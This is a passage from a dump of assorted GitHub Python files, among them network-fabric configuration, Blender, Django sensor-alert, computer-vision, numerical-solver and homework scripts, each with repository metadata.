\n","repo_name":"jaebeezy/hw","sub_path":"hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11111937483","text":"from acitoolkit.acitoolkit import Tenant, Context, BridgeDomain, AppProfile\nfrom acitoolkit.acitoolkit import EPG, Interface, L2Interface, Session\nfrom acitoolkit.acitoolkit import Credentials\n\n\ndef send_to_apic(tenant):\n \"\"\"\n Login to APIC and push the config\n\n :param tenant: Tenant class instance\n :return: request response object\n \"\"\"\n description = 'Basic Connectivity Example'\n creds = Credentials('apic', description)\n args = creds.get()\n\n # Login to APIC\n session = Session(args.url, args.login, args.password, False)\n session.login()\n resp = tenant.push_to_apic(session)\n if resp.ok:\n print('Success')\n return resp\n\n\ndef main():\n \"\"\"\n Main execution routine\n\n :return: None\n \"\"\"\n # Create a tenant\n tenant = Tenant('Coke')\n\n # Create a Context and a BridgeDomain\n context = Context('VRF-1', tenant)\n context.set_allow_all()\n bd = BridgeDomain('BD-1', tenant)\n bd.add_context(context)\n\n # Create an App Profile and an EPG\n app = AppProfile('sap', tenant)\n epg = EPG('sapepg', app)\n\n # Attach the EPG to 2 interfaces using VLAN 5 as the encap\n if1 = Interface('eth', '1', '101', '1', '62')\n if2 = Interface('eth', '1', '101', '1', '63')\n vlan5_on_if1 = L2Interface('vlan5_on_if1', 'vlan', '5')\n vlan5_on_if2 = L2Interface('vlan5_on_if2', 'vlan', '5')\n vlan5_on_if1.attach(if1)\n vlan5_on_if2.attach(if2)\n epg.attach(vlan5_on_if1)\n epg.attach(vlan5_on_if2)\n\n # Dump the necessary configuration\n print('URL: ' + str(tenant.get_url()))\n print('JSON: ' + str(tenant.get_json()))\n\n send_to_apic(tenant)\n\n # Clean up\n # tenant.mark_as_deleted()\n # send_to_apic(tenant)\n\nif __name__ == '__main__':\n main()\n","repo_name":"datacenter/acitoolkit","sub_path":"samples/aci-demo-script.py","file_name":"aci-demo-script.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":341,"dataset":"github-code","pt":"81"} +{"seq_id":"74666547463","text":"T = int(input())\nnum_lst = ['3', '6', '9']\nrst = []\nfor i in range(1, T+1):\n k = str(i)\n if '3' in k or '6' in k or '9' in k:\n sub = ''\n for j in k:\n if j not in num_lst:\n continue\n else:\n sub += '-'\n rst.append(sub)\n else:\n rst.append(k)\n\nprint(*rst)","repo_name":"Jeongseulho/CSstudy","sub_path":"Jaehyung/230305/[swea]간단한369게임.py","file_name":"[swea]간단한369게임.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"5058170491","text":"from datetime import date, timedelta\nimport pandas as pd\n\n\ndef program_referrals():\n filename = \"C:/Users/mingus/Documents/\" + str((date.today().replace(day=1) - timedelta(days=1)).month) + \"-\" + \\\n str((date.today().replace(day=1) - timedelta(days=1)).year) + \"_program_referrals.xlsx\"\n\n xl_writer = pd.ExcelWriter(filename, engine='xlsxwriter')\n df = pd.read_csv('C:/Users/mingus/Documents/program_referrals.csv')\n\n df.to_excel(xl_writer, sheet_name='Program Referrals', index=False)\n worksheet = xl_writer.sheets['Program Referrals']\n\n # df.referral_from.value_counts().plot(kind='pie', label='', ax=ax1)\n # df.referral_reason.value_counts().plot(kind='pie', label='', ax=ax2)\n # ax1.set_title('Referral From')\n # ax2.set_title('Referral Reason')\n # 
fig.tight_layout()\n # fig.savefig('program_referrals.png')\n # worksheet.insert_image('A20', 'program_referrals.png')\n\n xl_writer.save()\n\n\nprogram_referrals()\n","repo_name":"elijahanderson/KHIT-scripts","sub_path":"program_referrals.py","file_name":"program_referrals.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20214365036","text":"import sys\n\nfile = sys.argv[1]\nwith open(file, \"r\") as ifstream, open(file + \".analyze\", \"w\") as ofstream:\n lines = []\n numCommented = 0\n numLabels = 0\n for lineNum, line in enumerate(ifstream.readlines()):\n if line.startswith(\"(\"):\n numLabels += 1\n elif line.startswith(\"//\"):\n lines.append(str(lineNum - numCommented - numLabels) + \" \" + line)\n numCommented += 1\n ofstream.writelines(lines)\n\n","repo_name":"rguan72/nand2tetris","sub_path":"08/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33240585125","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n\nbl_info = {\n \"name\": \"Safe Localview\",\n \"author\": \"todashuta\",\n \"version\": (0, 0, 4),\n \"blender\": (3, 3, 0),\n \"location\": \"-\",\n \"description\": \"-\",\n \"warning\": \"\",\n \"wiki_url\": \"\",\n \"tracker_url\": \"\",\n \"category\": \"3D View\"\n}\n\n\nimport bpy\n\n\ndef get_addon_prefs():\n addon_prefs = bpy.context.preferences.addons[__name__].preferences\n return addon_prefs\n\n\nshading_types = {\n \"WIREFRAME\": \"Wireframe\",\n \"SOLID\": \"Solid\",\n}\n\n\nclass SafeLocalviewOperator(bpy.types.Operator):\n bl_idname = \"view3d.safe_localview\"\n bl_label = \"Safe Localview\"\n\n @classmethod\n def poll(cls, context):\n return bpy.ops.view3d.localview.poll()\n\n def execute(self, context):\n prefs = get_addon_prefs()\n in_localview = context.space_data.local_view is not None\n shading_type = context.space_data.shading.type\n if (in_localview and\n shading_type in {'MATERIAL', 'RENDERED'}):\n t = prefs.preferred_shading_type\n context.space_data.shading.type = t\n msg = f\"Viewport Shading changed to {shading_types[t]}\"\n self.report({\"INFO\"}, msg)\n\n return bpy.ops.view3d.localview(frame_selected=prefs.frame_selected)\n\n\ndef auto_rebind(self, context):\n unregister_keymaps()\n register_keymaps()\n\n\nclass SafeLocalviewPreferences(bpy.types.AddonPreferences):\n bl_idname = __name__\n\n items = (\n (\"WIREFRAME\", \"Wireframe\", \"\"),\n (\"SOLID\", \"Solid\", \"\"))\n preferred_shading_type: bpy.props.EnumProperty(\n name=\"Preferred Shading Type\",\n items=items)\n\n frame_selected: bpy.props.BoolProperty(\n name=\"Frame Selected\",\n description=\"Move 
the view to frame the selected objects\",\n default=True)\n\n use_shortcut: bpy.props.BoolProperty(\n name=\"Use Default Shortcut\",\n default=True,\n update=auto_rebind)\n\n def draw(self, context):\n layout = self.layout\n row = layout.row()\n row.prop(self, \"preferred_shading_type\")\n row.prop(self, \"frame_selected\")\n row.prop(self, \"use_shortcut\")\n\n\naddon_keymaps = []\ndef register_keymaps():\n prefs = get_addon_prefs()\n if not prefs.use_shortcut:\n return\n\n kc = bpy.context.window_manager.keyconfigs.addon\n if not kc:\n return\n\n km = kc.keymaps.new(name=\"3D View\", space_type=\"VIEW_3D\")\n kmi = km.keymap_items.new(SafeLocalviewOperator.bl_idname, \"SLASH\", \"PRESS\")\n addon_keymaps.append((km, kmi))\n\n km = kc.keymaps.new(name=\"3D View\", space_type=\"VIEW_3D\")\n kmi = km.keymap_items.new(SafeLocalviewOperator.bl_idname, \"NUMPAD_SLASH\", \"PRESS\")\n addon_keymaps.append((km, kmi))\n\ndef unregister_keymaps():\n for km,kmi in addon_keymaps:\n km.keymap_items.remove(kmi)\n addon_keymaps.clear()\n\n\nclasses = (\n SafeLocalviewPreferences,\n SafeLocalviewOperator,\n)\n\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n register_keymaps()\n\n\ndef unregister():\n unregister_keymaps()\n\n for cls in reversed(classes):\n bpy.utils.unregister_class(cls)\n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"todashuta/blender-addon-safe-localview","sub_path":"safe_localview.py","file_name":"safe_localview.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5059808876","text":"from datetime import datetime\nfrom typing import Any, cast\nimport arrow\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models import Avg\nfrom influxdb_client import InfluxDBClient\nfrom influxdb_client.client.write_api import SYNCHRONOUS\nfrom .secrets import INFLUXDB_BUCKET, INFLUXDB_ORG, INFLUXDB_TOKEN\nfrom django.utils.text import slugify\n# Create your models here.\nfrom twilio.rest import Client\n\n# Comment this out if you don't want to set up Twilio alerts\ntwilio_client = Client(\"<SECRET>\", \"<SECRET>\")\n\n\nclass Sensor(models.Model):\n name = models.CharField(max_length=60)\n sensor_id = models.CharField(max_length=100, default=\"\")\n high_critical = models.DecimalField(max_digits=30, decimal_places=10, null=True)\n high_warn = models.DecimalField(max_digits=30, decimal_places=10, null=True)\n\n @property\n def average(self):\n avg = self.data.aggregate(Avg(\"numeric_value\"))[\"numeric_value__avg\"]\n if avg:\n return round(avg, 2)\n return 0.00\n\n @property\n def count(self):\n return self.data.all().count()\n\n @property\n def last_data_point(self) -> \"SensorData\":\n return self.data.all().order_by(\"-datetime\").first()\n\n @property\n def last_eastern(self):\n if self.last_data_point:\n dt = self.last_data_point.datetime\n adt = arrow.Arrow.fromdatetime(dt)\n eastern = arrow.now(\"America/New_York\").tzinfo\n dt = adt.astimezone(eastern)\n adt = arrow.Arrow.fromdatetime(dt)\n return adt.format(\"M/D/YYYY h:mm a\")\n return \"\"\n\n @property\n def last_numeric(self):\n val = self.last_data_point.numeric_value\n if val:\n return round(val, 2)\n return 0\n\n def __str__(self) -> str:\n return f\"{self.name}: {self.sensor_id}\"\n\n\nclass SensorData(models.Model):\n sensor_mac_addr = models.CharField(max_length=50)\n datetime = models.DateTimeField()\n numeric_value = 
models.DecimalField(max_digits=30, decimal_places=10, null=True)\n string_value = models.TextField(null=True)\n sensor_id = models.CharField(max_length=100)\n owner = models.ForeignKey(\n Sensor, on_delete=models.CASCADE, null=True, default=None, related_name=\"data\"\n )\n\n def __str__(self) -> str:\n return f\"{self.sensor_id} at {self.datetime}\"\n\n def save(self, *arg, **kwargs):\n try:\n owner = Sensor.objects.get(sensor_id=self.sensor_id)\n except ObjectDoesNotExist:\n owner = Sensor.objects.create(name=self.sensor_id, sensor_id=self.sensor_id)\n self.owner = owner\n client = InfluxDBClient(\n url=\"https://us-east-1-1.aws.cloud2.influxdata.com\", token=INFLUXDB_TOKEN\n )\n \n reading = f\"{float(self.numeric_value):.2f}\"\n\n if owner.high_warn:\n if self.numeric_value > owner.high_warn:\n print(f\"Trying to send a text about a high value with reading {reading}\")\n twilio_client.messages.create(\n from_=\"+<FROM_NUMBER>\",\n to=\"+<TO_NUMBER>\",\n body=f\"The sensor {owner.name} is reading {reading}\"\n )\n print(\"Did I do it?\")\n\n if owner.high_critical:\n if self.numeric_value > owner.high_critical:\n print(f\"Got a critical value {reading}\")\n twilio_client.calls.create(\n twiml=f\"<Response><Say>The sensor {owner.name} got a critical reading {reading}</Say></Response>\",\n from_=\"+<FROM_NUMBER>\",\n to=\"+<TO_NUMBER>\",\n )\n print(\"Handle warning critical\")\n\n if not self.pk:\n sensor_name = slugify(owner.name)\n print(\"About to save to influx db!\")\n write_api = client.write_api(write_options=SYNCHRONOUS)\n timestamp = int(self.datetime.timestamp() * 1e9)\n data = f\"environmentals,mac_addr={self.sensor_mac_addr},sensor_id={self.sensor_id},sensor_name={sensor_name} value={self.numeric_value} {timestamp}\"\n write_api.write(INFLUXDB_BUCKET, INFLUXDB_ORG, data)\n print(\"Saved to influxdb\")\n\n super().save(*arg, **kwargs)\n","repo_name":"gojefferson/django-sensor","sub_path":"api/sensors/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26776259492","text":"from numpy import e, tanh, log, linspace, sinh, abs, vstack, array, zeros, cosh\nfrom pylab import show, plot, savefig, legend, xlabel, ylabel, title\nfrom scipy.integrate import solve_bvp\n\ndef InfinitePlane():\n x = linspace(0,5)\n phi0 = 1.\n phiDebyeHuckle = phi0*e**(-x)\n phi = 2*log((1+e**(-x)*tanh(0.25*phi0))/(1-e**(-x)*tanh(0.25*phi0)))\n plot(x,phiDebyeHuckle,label='Debye-Huckle linearization')\n plot(x,phi, label = 'Poisson-Boltzmann equation solution')\n legend()\n show()\n\ndef fun(x, y):\n return vstack((y[1], k**2*sinh(y[0])))\n\ndef bc(ya, yb):\n return array([abs(ya[0]-phi0), abs(yb[0]-phi0)])\n\ndef SymmetryPlanes():\n x = linspace(-1,1,100)\n \n phiDebyeHuckle = phi0*cosh(k*x)/cosh(k)\n y_a = zeros((2, x.size))\n\n res_a = solve_bvp(fun, bc, x, y_a)\n y_plot_a = res_a.sol(x)[0]\n\n plot(x,phiDebyeHuckle,label='Debye-Huckle linearization')\n plot(x,y_plot_a, label = 'Poisson-Boltzmann equation solution')\n xlabel('x')\n ylabel(r'$\\varphi(x)$')\n legend()\n title('Potential distribution across parallel plates \\n'+r'$\\varphi = k^2 \\sinh(\\varphi), \\varphi(\\pm 1) = \\zeta, \\zeta = {}, k = {}$'.format(phi0, k))\n savefig('out.png')\n show()\n\nphi0 =6.\nk = 
4.\nSymmetryPlanes()\n","repo_name":"konstgav/electrokinetics","sub_path":"zeta.py","file_name":"zeta.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"35303664394","text":"from resources.texts import logo\nfrom serverueberwachung.console_management.CommandHandler import CommandHandler\nfrom serverueberwachung.console_management.Command_List import item_index, command_list\nfrom serverueberwachung.resources.uid_list import HOST, PORT\n\n\n# the user input the network configuration for connecting to the tinkerforge-server\ndef bootup():\n config_finished = False\n global HOST\n global PORT\n\n # try:\n # while not config_finished:\n # if HOST == \"\":\n # HOST = input(\"Bitte geben sie die IP/Domain der Serverüberwachung ein: \")\n # elif PORT == 0:\n # PORT = int(input(\"Bitte geben sie den passenden Port ein: \"))\n # else:\n # config_finished = True\n # except:\n # print(\"keine Verbindung\")\n\n\n# beginning of the main loop\nrunning = True\nprint(logo)\ncommandHandler = CommandHandler()\n\nbootup()\n\n# the main-loop of the programm\nwhile running:\n command = input(\"=> \")\n if command.lower() == \"exit\":\n running = False\n else:\n commandHandler.evaluate(command.lower())\n","repo_name":"JustinThlk/serverueberwachung","sub_path":"serverueberwachung/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"73488012104","text":"##\n#\n# Project Euler 74\n# https://projecteuler.net/problem=74\n# By: Elias Lundell\n#\n##\n\nfrom multiprocessing import Pool\n\nprefac = {\"0\": 1, \"1\": 1, \"2\": 2, \"3\": 6, \"4\": 24, \"5\": 120, \"6\": 720, \"7\": 5040, \"8\": 40320, \"9\": 362880}\n\ndef chain_length(n):\n chain = {n}\n new = n\n while True:\n clen = len(chain)\n new = sum(map(lambda m: prefac[m], str(new)))\n if new in chain or clen > 60:\n return clen\n else:\n chain.add(new)\n\np = Pool(12)\n\nchain_lengths = p.map(chain_length, [x for x in range(1, 1000001)])\n\nprint(chain_lengths.count(60))\n\n","repo_name":"LogFlames/project-euler-python","sub_path":"pe74.py","file_name":"pe74.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12206595322","text":"import os\nimport httplib\nimport socket\nimport ssl\nimport urllib2\n\n\nPEM_FILE = os.path.join(os.path.dirname(__file__), 'WebMoneyCA.crt')\n\n\nclass VerifiedHTTPSConnection(httplib.HTTPConnection):\n \"Verified connection to SSL host\"\n\n default_port = 443\n\n def connect(self):\n sock = socket.create_connection(\n (self.host, self.port),\n self.timeout, self.source_address\n )\n\n if self._tunnel_host:\n self.sock = sock\n self._tunnel()\n\n self.sock = ssl.wrap_socket(sock, ca_certs=PEM_FILE, cert_reqs=ssl.CERT_REQUIRED)\n\n\nclass HTTPSHandler(urllib2.HTTPSHandler):\n def https_open(self, req):\n return self.do_open(VerifiedHTTPSConnection, req)\n\n\nwm_opener = urllib2.build_opener(HTTPSHandler)\n","repo_name":"vden/python-webmoney","sub_path":"webmoney/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71310661064","text":"# -*- encoding=utf8 -*-\n\nimport yaml\nimport json\nimport os.path\nimport urllib.request\nimport urllib.parse\n\nimport 
logging\n\nCURDIR = os.path.dirname(__file__)\nCONFIG_FILE = os.path.join(CURDIR, 'configs', 'wxpusher.yaml')\n\nWX_ENABLED = True\nif not os.path.exists(CONFIG_FILE):\n print('Cannot find config {}'.format(CONFIG_FILE))\n WX_ENABLED = False\n\nCONFIG = yaml.load(open(CONFIG_FILE))\nUID = CONFIG['user_id']\nTOKEN = CONFIG['token']\n\ndef wx_send(msg):\n if not WX_ENABLED:\n return False\n\n data = {\n 'appToken': TOKEN,\n 'content': msg,\n 'uid': UID\n }\n\n try:\n data = urllib.parse.urlencode(data)\n url = 'http://wxpusher.zjiecode.com/api/send/message/?{}'.format(data)\n response = urllib.request.urlopen(url)\n\n ret = json.loads(response.read())\n return ret['success']\n except:\n return False\n\ndef install_logging_handler(logger, fmt=None, lvl=logging.WARNING):\n wx_handler = WXHandler()\n wx_handler.setLevel(lvl)\n\n if fmt:\n if not isinstance(fmt, logging.Formatter) and isinstance(fmt, str):\n fmt = logging.Formatter(fmt)\n else:\n raise RuntimeError('Unknown formater type: {}'.format(fmt))\n\n wx_handler.setFormatter(fmt)\n\n logger.addHandler(wx_handler)\n\nclass WXHandler(logging.Handler):\n def emit(self, record):\n wx_send(self.format(record))\n\n__all__ = ['wx_send', 'install_logging_handler']\n\nif __name__ == '__main__':\n assert wx_send('send_msg test.'), 'Failed to send msg.'\n assert wx_send('send_msg 中文测试'), 'Failed to send msg.'\n\n","repo_name":"yrlihuan/LinuxConf","sub_path":"wxpusher.py","file_name":"wxpusher.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"21176577950","text":"'''Crie um programa que tenha uma função chamada voto() que vai receber como parâmetro\no ano de nascimento de uma pessoa, retornando um valor literal indicando se uma pessoa\ntem voto NEGADO, OPCIONAL e OBRIGATÓRIO nas eleições.'''\n\n\ndef voto(v):\n from datetime import date\n ano = date.today().year\n idade = ano - v\n if idade < 16:\n return print(f'Com {idade} anos : NÃO VOTA')\n elif 16 <= idade < 18 or idade >= 65:\n return print(f'Com {idade} anos: VOTO OPCIONAL.')\n else:\n return print(f'Com idade {idade}: VOTO OBRIGATÓRIO.')\n\n\nano = int(input('Digite o ano de seu nascimento: '))\nvoto(ano)\n\n","repo_name":"Alexandre1961/Python","sub_path":"curso_em_video/ex101.py","file_name":"ex101.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25933622283","text":"import argparse\nimport logging\nimport time\n\nimport numpy as np\nimport torch\n\ntry:\n import cv2 # pylint: disable=import-error\nexcept ImportError:\n cv2 = None\n\nimport PIL\ntry:\n import PIL.ImageGrab\nexcept ImportError:\n pass\n\ntry:\n import mss\nexcept ImportError:\n mss = None\n\nLOG = logging.getLogger(__name__)\n\n\n# pylint: disable=abstract-method\nclass Stream(torch.utils.data.IterableDataset):\n horizontal_flip = None\n rotate = None\n crop = None\n scale = 1.0\n start_frame = None\n start_msec = None\n max_frames = None\n\n def __init__(self, source, *,\n preprocess=None,\n with_raw_image=True):\n super().__init__()\n\n self.source = source\n self.preprocess = preprocess\n self.with_raw_image = with_raw_image\n\n @classmethod\n def cli(cls, parser: argparse.ArgumentParser):\n \"\"\"Command line interface (CLI) to extend argument parser.\"\"\"\n group = parser.add_argument_group('Stream')\n group.add_argument('--horizontal-flip', default=False, action='store_true',\n help='mirror input image')\n 
group.add_argument('--scale', default=1.0, type=float,\n help='input image scale factor')\n group.add_argument('--start-frame', type=int, default=None,\n help='start frame')\n group.add_argument('--start-msec', type=float, default=None,\n help='start millisecond')\n group.add_argument('--crop', type=int, nargs=4, default=None,\n help='left top right bottom')\n group.add_argument('--rotate', default=None, choices=('left', 'right', '180'),\n help='rotate')\n group.add_argument('--max-frames', type=int, default=None,\n help='max frames')\n\n @classmethod\n def configure(cls, args: argparse.Namespace):\n \"\"\"Take the parsed argument parser output and configure class variables.\"\"\"\n cls.horizontal_flip = args.horizontal_flip\n cls.scale = args.scale\n cls.start_frame = args.start_frame\n cls.start_msec = args.start_msec\n cls.crop = args.crop\n cls.rotate = args.rotate\n cls.max_frames = args.max_frames\n\n # pylint: disable=unsubscriptable-object\n def preprocessing(self, image):\n if self.scale != 1.0:\n image = cv2.resize(image, None, fx=self.scale, fy=self.scale)\n LOG.debug('resized image size: %s', image.shape)\n if self.horizontal_flip:\n image = image[:, ::-1]\n if self.crop:\n if self.crop[0]:\n image = image[:, self.crop[0]:]\n if self.crop[1]:\n image = image[self.crop[1]:, :]\n if self.crop[2]:\n image = image[:, :-self.crop[2]]\n if self.crop[3]:\n image = image[:-self.crop[3], :]\n if self.rotate == 'left':\n image = np.swapaxes(image, 0, 1)\n image = np.flip(image, axis=0)\n elif self.rotate == 'right':\n image = np.swapaxes(image, 0, 1)\n image = np.flip(image, axis=1)\n elif self.rotate == '180':\n image = np.flip(image, axis=0)\n image = np.flip(image, axis=1)\n\n image_pil = PIL.Image.fromarray(np.ascontiguousarray(image))\n meta = {\n 'hflip': False,\n 'offset': np.array([0.0, 0.0]),\n 'scale': np.array([1.0, 1.0]),\n 'valid_area': np.array([0.0, 0.0, image_pil.size[0], image_pil.size[1]]),\n }\n processed_image, anns, meta = self.preprocess(image_pil, [], meta)\n return image, processed_image, anns, meta\n\n # pylint: disable=too-many-branches\n def __iter__(self):\n if self.source == 'screen':\n capture = 'screen'\n if mss is None:\n print('!!!!!!!!!!! 
install mss (pip install mss) for faster screen grabs')\n else:\n capture = cv2.VideoCapture(self.source)\n if self.start_frame:\n capture.set(cv2.CAP_PROP_POS_FRAMES, self.start_frame)\n if self.start_msec:\n capture.set(cv2.CAP_PROP_POS_MSEC, self.start_msec)\n\n frame_start = 0 if not self.start_frame else self.start_frame\n frame_i = frame_start\n while True:\n frame_i += 1\n if self.max_frames and frame_i - frame_start > self.max_frames:\n LOG.info('reached max frames %d', self.max_frames)\n break\n\n if capture == 'screen':\n if mss is None:\n image = np.asarray(PIL.ImageGrab.grab().convert('RGB'))\n else:\n with mss.mss() as sct:\n monitor = sct.monitors[1]\n image = np.asarray(sct.grab(monitor))[:, :, 2::-1]\n else:\n _, image = capture.read()\n if image is not None:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n if image is None:\n LOG.info('no more images captured')\n break\n\n start_preprocess = time.perf_counter()\n image, processed_image, anns, meta = self.preprocessing(image)\n meta['frame_i'] = frame_i\n meta['preprocessing_s'] = time.perf_counter() - start_preprocess\n\n if self.with_raw_image:\n yield image, processed_image, anns, meta\n else:\n yield processed_image, anns, meta\n","repo_name":"openpifpaf/openpifpaf","sub_path":"src/openpifpaf/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":1098,"dataset":"github-code","pt":"81"} +{"seq_id":"6319632631","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 13 22:59:24 2020\r\n\r\n@author: ADMIN-PC\r\n\"\"\"\r\nimport numpy as np\r\n\r\ndef transform(X,degree = 2):\r\n \"\"\"\r\n Transform data to polynomial features\r\n Generate a new feature matrix consisting of all polynomial combinations of the features with degree less than or equal to the specified degree. 
\r\n For example, if an input sample is np.array([a, b]), the degree-2 polynomial features with \"include_bias=True\" are [1, a, b, a^2, ab, b^2].\r\n \r\n Inputs:\r\n param X : (np.array) Dataset to be transformed\r\n \r\n Outputs:\r\n returns (np.array) Tranformed dataset.\r\n \"\"\"\r\n out = [1]\r\n for deg in range(1,degree+1):\r\n for num in X:\r\n out.append(num**deg)\r\n return np.array(out)\r\n\r\nX = np.array([2,3, 4])\r\nprint(transform(X))","repo_name":"vasavamsi/Machine-Learning-Assignment-2","sub_path":"preprocessing/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32214134926","text":"import numpy as np\r\nimport Crank_Nicolson_Method\r\n\r\n# Density\r\nrho = 1.0\r\n# Velocity\r\nu = 1.0\r\n# Diffusion coefficient\r\nGamma = 0.1\r\n# Length of Domain\r\nL = 1.0\r\n\r\n# Number of points in grid (minus 1)\r\nm = 1000\r\n# Grid distance\r\nDx = L / m\r\n\r\n# Total time for boundary information \r\n# to travel across the domain\r\ntotal_t = 2 # max(abs(rho * L**2 / Gamma), abs(L / u))\r\n# Time step\r\nDt = 0.0001\r\n# Number of time steps to run (minus 1)\r\nm_t = int(np.ceil(total_t / Dt))\r\n\r\n# Courant number\r\nc = u * Dt / Dx\r\n# Ratio to time step to diffusion time across cell\r\nd = Gamma * Dt / (rho * (Dx**2))\r\n\r\nphi = Crank_Nicolson_Method.solve(m, Dx, m_t, Dt, d, c, 3)\r\n\r\nnp.save('Exact_Solution', phi)\r\n\r\n","repo_name":"Souritra-Garai/Steady-State-Convection-Diffusion-Problem","sub_path":"2D Steady State Problem/Exact_Solution.py","file_name":"Exact_Solution.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"1198612467","text":"import cv2\r\nimport numpy as np\r\nimport tkinter\r\nfrom tkinter import messagebox\r\nfrom tkinter import filedialog\r\nfrom tkinter import *\r\n\r\ndef original_Pic():\r\n \r\n \r\n global filename1\r\n filename1 = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"jpeg files\",\"*.jpg\"),(\"all files\",\"*.*\")))\r\n \r\n \r\ndef compare_Pic():\r\n \r\n \r\n global filename2\r\n filename2 = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"jpeg files\",\"*.jpg\"),(\"all files\",\"*.*\")))\r\n \r\n\r\n\r\ndef twentyone():\r\n original = cv2.imread(filename1)\r\n image_to_compare = cv2.imread(filename2)\r\n\r\n\r\n # 1) Check if 2 images are equals\r\n if original.shape == image_to_compare.shape:\r\n print(\"The images have same size and channels\")\r\n difference = cv2.subtract(original, image_to_compare)\r\n b, g, r = cv2.split(difference)\r\n\r\n if cv2.countNonZero(b) == 0 and cv2.countNonZero(g) == 0 and cv2.countNonZero(r) == 0:\r\n print(\"The images are completely Equal\")\r\n else:\r\n print(\"The images are NOT equal\")\r\n\r\n # 2) Check for similarities between the 2 images\r\n sift = cv2.SIFT_create()\r\n kp_1, desc_1 = sift.detectAndCompute(original, None)\r\n kp_2, desc_2 = sift.detectAndCompute(image_to_compare, None)\r\n\r\n index_params = dict(algorithm=0, trees=5)\r\n search_params = dict()\r\n flann = cv2.FlannBasedMatcher(index_params, search_params)\r\n\r\n matches = flann.knnMatch(desc_1, desc_2, k=2)\r\n\r\n good_points = []\r\n for m, n in matches:\r\n if m.distance < 0.6*n.distance:\r\n good_points.append(m)\r\n\r\n # Define how similar they are\r\n number_keypoints = 0\r\n if 
len(kp_1) <= len(kp_2):\r\n number_keypoints = len(kp_1)\r\n else:\r\n number_keypoints = len(kp_2)\r\n\r\n\r\n #print(\"Keypoints 1ST Image: \" + str(len(kp_1)))\r\n #print(\"Keypoints 2ND Image: \" + str(len(kp_2)))\r\n #print(\"GOOD Matches:\", len(good_points))\r\n #print(\"How good it's the match: \", len(good_points) / number_keypoints*100 )\r\n global matchresult\r\n matchresult=len(good_points) / number_keypoints*100\r\n\r\n matchresult1='The Match Result Is:- ' , matchresult , ' %'\r\n a23=tkinter.Label(win,text= matchresult1)\r\n a23.place(x=200,y=600, height=50,width=900)\r\n a23['bg']='lightyellow'\r\n a23['fg']=\"green\"\r\n a23.config(font=(\"Courier\", 15,\"bold\"))\r\n\r\n \r\n result = cv2.drawMatches(original, kp_1, image_to_compare, kp_2, good_points, None)\r\n \r\n messagebox.showinfo('Matching Result is ', matchresult1)\r\n cv2.imshow(\"result\", cv2.resize(result, None, fx=0.4, fy=0.4))\r\n \r\n #cv2.imwrite(\"feature_matching.jpg\", result)\r\n\r\n\r\n #cv2.imshow(\"Original\", cv2.resize(original, None, fx=0.4, fy=0.4))\r\n #cv2.imshow(\"Duplicate\", cv2.resize(image_to_compare, None, fx=0.4, fy=0.4))\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n\r\n\r\nwin= tkinter.Tk()\r\nwin.minsize(1080,720)\r\nwin['bg']='plum1'\r\na30=tkinter.Label(win,text=\"IMAGE \\nMATCHING/COMPARISION\")\r\n\r\na30.place(x=300,y=50, 